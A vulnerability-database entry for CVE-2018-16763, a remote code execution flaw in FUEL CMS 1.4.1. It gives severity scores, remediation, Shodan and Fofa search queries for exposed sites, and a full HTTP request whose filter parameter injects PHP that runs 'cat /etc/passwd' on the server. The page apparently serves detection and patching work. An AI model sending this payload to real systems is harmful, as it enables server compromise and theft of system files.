🔙 목록으로 돌아가기

CVE-2018-16763: FUEL CMS 1.4.1 - Remote Code Execution

TitleFUEL CMS 1.4.1 - Remote Code Execution
Authorpikpikcu
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.
RemediationUpgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
CVSS Score9.8
EPSS Score0.93933
CVE IDCVE-2018-16763
CWE IDCWE-74
Shodan Queryhttp.title:"fuel cms"
Fofa Querytitle="fuel cms"
Tags cve cve2018 fuelcms rce edb thedaylightstudio vkev vuln

🔍 Vulnerability Description

FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.

🌐 HTTP Request

GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.8
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16763.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16763.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A